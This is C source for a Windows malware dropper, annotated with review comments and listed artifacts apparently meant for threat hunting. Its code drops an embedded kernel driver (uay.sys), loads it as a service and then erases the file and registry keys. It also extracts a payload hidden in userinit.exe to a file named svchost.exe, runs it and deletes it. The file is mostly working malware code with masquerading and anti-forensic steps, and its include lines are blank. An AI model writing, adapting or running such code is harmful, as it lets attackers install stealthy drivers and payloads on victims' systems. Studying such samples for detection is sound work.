

#include  
#include  
#include  
#include  
 
/* Forward declarations for the dropper stages called from WinMain.
 *
 * Artifacts this file touches (useful when hunting for the sample):
 *   - <system dir>\uay.sys                       (written, loaded, then deleted)
 *   - service "uay.sys" / HKLM\SYSTEM\CurrentControlSet\Services\uay.sys (+Enum, +Security)
 *   - <windows dir>\svchost.exe                  (extracted payload; run, then deleted)
 *
 * ReleAseTheSys and ReleAseTheUserinit return -1 on their early-failure
 * paths and 0 otherwise; the remaining helpers always return 0. WinMain
 * ignores every return value. */
int ReleAseTheSys(void);   // write the embedded "uay"/"sys" resource to <system dir>\uay.sys
int LoAdSys(void);         // register uay.sys as a kernel-driver service and start it
int DeleteSysKey(void);    // delete the Services\uay.sys registry keys again

/* Copy <system dir>\userinit.exe from byte offset modify_dAtA.file_length
 * to end-of-file into a new file at ReleAseWhere. */
int
ReleAseTheUserinit(
	char* ReleAseWhere //like "C:\\WINDOWS\\System32\\temp_userinit.exe"
	);

/* Run the file written by ReleAseTheUserinit, wait for it to exit, delete it. */
int
RunUserinitThenDeleteIt(
	char* where //like "C:\\WINDOWS\\System32\\temp_userinit.exe"
	//must be the sAme As ReleAseTheUserinit's
	);
 
/* Patch slot filled in by an external tool after this binary is built: per
 * the author's note the tool scans the image for the marker 0x12345678 and
 * overwrites file_length. ReleAseTheUserinit uses file_length as the byte
 * offset inside <system dir>\userinit.exe at which the data it copies out
 * begins; it stays 0 until patched. (The tag _MODIFY_DATA is a reserved
 * identifier — leading underscore plus capital.) */
struct	_MODIFY_DATA{
	unsigned int finder;       // marker the patching tool searches for
	unsigned int file_length;  // start offset of the copied-out data in userinit.exe
}modify_dAtA = {0x12345678,0};//modified by Another exe,when finded 0x12345678
 
/* Entry point. Stage 1 drops the embedded driver to <system dir>\uay.sys,
 * registers and starts it, and immediately removes the file and its
 * service registry keys. Stage 2 extracts the data stored after offset
 * modify_dAtA.file_length in <system dir>\userinit.exe to
 * <windows dir>\svchost.exe, runs it, and deletes it.
 * None of the helper return values or Win32 results are checked; all four
 * WinMain parameters are unused. Always returns 0. */
int WINAPI
WinMain(
	HINSTANCE hInstAnce,  // handle to current instance
	HINSTANCE hPrevInstAnce,  // handle to previous instance
	LPSTR lpCmdLine,      // pointer to command line
	int nCmdShow          // show state of window
	)
{
	char	syspAth[MAX_PATH+1];
	char	userinitpAth[MAX_PATH+1];

	//driver part
	ReleAseTheSys();
	LoAdSys();
	//delete the sys,reg.
	//The driver image and its service keys are removed right after
	//StartService, so the file is only on disk for the duration of the load.
	GetSystemDirectory(syspAth,MAX_PATH);
	strcat(syspAth,"\\uay.sys");
	DeleteFile(syspAth);
	printf("DeleteFile: %d\n",GetLastError());
	DeleteSysKey();


	//userinit.exe part
	//Note the target is the *Windows* directory (GetWindowsDirectory), not
	//System32, even though the file is named svchost.exe.
	GetWindowsDirectory(userinitpAth,MAX_PATH);
	strcat(userinitpAth,"\\svchost.exe");
	ReleAseTheUserinit(userinitpAth);
	RunUserinitThenDeleteIt(userinitpAth);
	return 0;

}
//-------------------------------------------------------------------- 
/* Write the resource named "uay" of type "sys" from this module to
 * <system dir>\uay.sys, overwriting any existing file (CREATE_ALWAYS).
 *
 * Returns 0 on success; -1 if the resource cannot be found, is empty,
 * cannot be loaded/locked, if CreateFile returns NULL, or if WriteFile fails.
 *
 * NOTE(review): CreateFile reports failure with INVALID_HANDLE_VALUE rather
 * than NULL, so the NULL test does not detect a failed open. On the
 * WriteFile failure path the handle is not closed before returning.
 * GetSystemDirectory is given a 128-byte buffer and strcat then appends
 * "\\uay.sys" with no remaining-length check. */
int ReleAseTheSys(void)
{
	HRSRC	hRes = NULL;
	DWORD	dwResSize = 0;
	HGLOBAL	hResource = NULL;
	LPVOID	lpfResource = NULL;
	HANDLE	hFile = NULL;
	char	SystemDir[128];//i think it's enough
	DWORD	dwWritten;
	DWORD	result;

	// NULL module handle: the resource is looked up in this executable.
	hRes = FindResource(NULL,"uay","sys");
	if (hRes == NULL) {
		return -1;
	}
	dwResSize = SizeofResource(NULL,hRes);
	if (dwResSize == 0) {
		return -1;
	}
	hResource = LoadResource(NULL,hRes);
	if (hResource == NULL){
		return -1;
	}
	lpfResource = LockResource(hResource);
	if (lpfResource == NULL) {
		return -1;
	}
	GetSystemDirectory(SystemDir,128);
	strcat(SystemDir,"\\uay.sys");

	// Exclusive (share mode 0), write-only, always truncate/create.
	hFile = CreateFile(SystemDir,GENERIC_WRITE,0,NULL,CREATE_ALWAYS,0,NULL);
	if (hFile == NULL){
		return -1;
	}
	// The whole resource is written in one call; dwWritten is not compared to dwResSize.
	result = WriteFile(hFile,lpfResource,dwResSize,&dwWritten,NULL);

	if (result == 0){
		return -1;
	}
	CloseHandle(hFile);

	return 0;
}
//-------------------------------------------------------------------- 
/* Register <system dir>\uay.sys as a demand-start kernel-driver service
 * named "uay.sys" and start it. Any existing service of that name is
 * deleted first, and a CreateService failure (e.g. it already exists) is
 * tolerated so that the subsequent OpenService/StartService can proceed.
 *
 * Every SCM result is ignored apart from the printed GetLastError values;
 * the function always returns 0.
 *
 * NOTE(review): OpenSCManager's handle is never checked, and
 * DeleteService/CloseServiceHandle are called with a NULL handle when
 * OpenService fails (the NULL branches below are empty). */
int LoAdSys(void)
{
	//create the service, load the driver
	SC_HANDLE hSCHAndle;
	SC_HANDLE hSCMAnAger;

	char	systemdir[MAX_PATH+1];
	char	pAth[MAX_PATH+1];
	GetSystemDirectory(systemdir,MAX_PATH);
	sprintf(pAth,"%s\\%s",systemdir,"uay.sys");

	hSCMAnAger = OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);

	//remove old instAnces
	hSCHAndle = OpenService(hSCMAnAger,
							"uay.sys",
							SERVICE_ALL_ACCESS
							);
	if (hSCHAndle == NULL){
		//throw
		//return -1;
	}
	DeleteService(hSCHAndle);
	CloseServiceHandle(hSCHAndle);

	//ignore success of instAllAtion:it mAy AlreAdy be instAlled
	// Service name and display name are both "uay.sys"; binary path is pAth.
	hSCHAndle = CreateService(
					hSCMAnAger,
					"uay.sys",
					"uay.sys",
					SERVICE_ALL_ACCESS,
					SERVICE_KERNEL_DRIVER,
					SERVICE_DEMAND_START,
					SERVICE_ERROR_NORMAL,
					pAth,
					NULL,
					NULL,
					NULL,
					NULL,
					NULL
					);
	if (hSCHAndle == NULL){
		printf("CreAteService error: %d\n",GetLastError());
		//return -1;
	}
	CloseServiceHandle(hSCHAndle);

	//ignore success of stArt: it mAy ALreAdy be stAarted
	hSCHAndle = OpenService(hSCMAnAger,
							"uay.sys",
							SERVICE_ALL_ACCESS
							);
	if (hSCHAndle == NULL){
		printf("OpenService error: %d\n",GetLastError());
		//return -1;
	}
	// No service arguments are passed; the printed value is whatever
	// GetLastError holds after the call, success or not.
	StartService(hSCHAndle,0,NULL);
	printf("stArtService %d\n",GetLastError());
	CloseServiceHandle(hSCHAndle);

	CloseServiceHandle(hSCMAnAger);
	return 0;
}
//-------------------------------------------------------------------- 
/* Copy the bytes of <system dir>\userinit.exe from offset
 * modify_dAtA.file_length to end-of-file into a new file at ReleAseWhere.
 *
 * Returns 0 on success, -1 if either file cannot be opened.
 *
 * NOTE(review): the source file is held in a variable named pMyself, which
 * suggests this stub is expected to be installed as userinit.exe with other
 * data appended behind it at file_length — confirm against the tool that
 * patches modify_dAtA. _stat, malloc, fread and fwrite results are not
 * checked, so a 0 file_length (unpatched) copies the whole file. If the
 * second fopen fails, pMyself is not closed. `length` is a DWORD printed
 * with %d. */
int
ReleAseTheUserinit(
	char* ReleAseWhere //like "C:\\WINDOWS\\System32\\temp_userinit.exe"
	)
{
	FILE*	pMyself		= NULL;
	FILE*	pUserinit	= NULL;

	char*	buff;
	DWORD	length;

	struct _stat ST;
	char	pAth_userinit[MAX_PATH+1];

	GetSystemDirectory(pAth_userinit,MAX_PATH);
	strcat(pAth_userinit,"\\userinit.exe");
	_stat(pAth_userinit,&ST);   // only st_size is used below
	pMyself = fopen(pAth_userinit,"rb");
	if(pMyself == NULL){
		printf("open file fAiled\n");
		return -1;
	}
	pUserinit = fopen(ReleAseWhere,"wb");
	if(pUserinit == NULL){
		printf("creAte file fAiled\n");
		return -1;
	}
	// Skip the leading file_length bytes; everything after them is the output.
	fseek(pMyself,modify_dAtA.file_length,SEEK_SET);
	length = ST.st_size - modify_dAtA.file_length ;

	printf("length: %d\n",length);///debug
	buff = malloc(length);
	fread(buff,length,1,pMyself);
	fwrite(buff,length,1,pUserinit);
	free(buff);
	fclose(pMyself);
	fclose(pUserinit);
	return 0;
}
//-------------------------------------------------------------------- 
/* Launch the file at `where` as a child process with a default STARTUPINFO
 * (only cb set), no inherited handles and no creation flags, block until it
 * exits, then delete the file.
 *
 * Always returns 0. CreateProcess's result is not checked: pi is
 * zero-initialised, so on failure WaitForSingleObject is handed a NULL
 * handle (which fails rather than blocks) and the file is deleted anyway.
 * The process and thread handles in pi are never closed. */
int
RunUserinitThenDeleteIt(
	char* where //like "C:\\WINDOWS\\System32\\temp_userinit.exe"
	//must be the sAme As ReleAseTheUserinit's
	)
{
	PROCESS_INFORMATION		pi={0};
	STARTUPINFO				si={sizeof(STARTUPINFO)};

	// `where` is passed as lpApplicationName, so no command-line parsing occurs.
	CreateProcess(
		where,//"C:\\WINDOWS\\System32\\temp_userinit.exe",
		NULL,
		NULL,
		NULL,
		FALSE,
		0,
		NULL,
		NULL,
		&si,
		&pi
		);
	//printf("CreAteProcess: %d\n",GetLastError());
	WaitForSingleObject(
		pi.hProcess,
		INFINITE
		);
	DeleteFile(where);
	return 0;
}
//-------------------------------------------------------------------- 
/* Remove the registry footprint of the "uay.sys" service. The Enum and
 * Security subkeys are deleted first because RegDeleteKey refuses to delete
 * a key that still has subkeys; Services\uay.sys itself goes last.
 *
 * Always returns 0. NOTE(review): RegDeleteKey reports its status in the
 * return value, which is discarded here; GetLastError is not necessarily
 * updated by it, so the printed numbers may not describe the deletion. */
int DeleteSysKey(void)
{
	RegDeleteKey(
		HKEY_LOCAL_MACHINE,
		"SYSTEM\\CurrentControlSet\\Services\\uay.sys\\Enum"
		);
	printf("RegDeleteKey: %d\n",GetLastError());
	RegDeleteKey(
		HKEY_LOCAL_MACHINE,
		"SYSTEM\\CurrentControlSet\\Services\\uay.sys\\Security"
		);
	printf("RegDeleteKey: %d\n",GetLastError());
	RegDeleteKey(
		HKEY_LOCAL_MACHINE,
		"SYSTEM\\CurrentControlSet\\Services\\uay.sys"
		);
	printf("RegDeleteKey: %d\n",GetLastError());
	return 0;
}
//--------------------------------------------------------------------